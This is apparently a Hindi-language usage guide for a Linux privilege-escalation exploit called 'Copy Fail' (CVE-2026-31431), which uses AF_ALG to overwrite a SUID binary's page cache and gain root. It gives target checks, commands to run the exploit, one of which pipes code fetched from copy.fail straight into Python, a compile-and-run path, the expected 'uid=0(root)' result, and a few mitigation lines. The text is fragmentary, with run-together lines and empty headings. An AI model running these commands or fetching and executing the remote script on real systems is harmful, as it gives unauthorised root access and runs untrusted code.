
CVE-2026-31431 के लिए Linux लोकल प्रिविलेज एस्केलेशन एक्सप्लॉइट, जो AF_ALG कर्नेल क्रिप्टो API के माध्यम से SUID बाइनरीज़ के पेज कैश को ओवरराइट करके रूट एक्सेस प्राप्त करता है।
यह सामग्री केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम पर इसे न चलाएं।
Copy Fail (CVE-2026-31431) एक Linux लोकल प्रिविलेज एस्केलेशन (LPE) भेद्यता है जो AF_ALG के माध्यम से कर्नेल क्रिप्टो API को प्रभावित करती है।
यह एक अपरिविलेज्ड उपयोगकर्ता को SUID बाइनरी (जैसे, /usr/bin/su) के पेज कैश डेटा को अधिलेखित करने और रूट एक्सेस प्राप्त करने की अनुमति देती है।
AF_ALG सक्षमalgif_aead मॉड्यूल लोडेडos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
अपेक्षित संकेतक:
authencesn(hmac(sha256),cbc(aes))algif_aead लोडेडpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
अपेक्षित परिणाम:
uid=0(root)
os.splice not foundकारण:
समाधान:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
संभावित कारण:
आवश्यक उपकरण स्थापित करें:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
अपना सिस्टम अपडेट करें:
apt update && apt upgrade
यदि एक्सप्लॉइट विफल हो जाता है, तो विचार करें:
इस एक्सप्लॉइट का उपयोग केवल लैब्स, CTFs, और अधिकृत पेंटेस्ट में जिम्मेदारी से करें।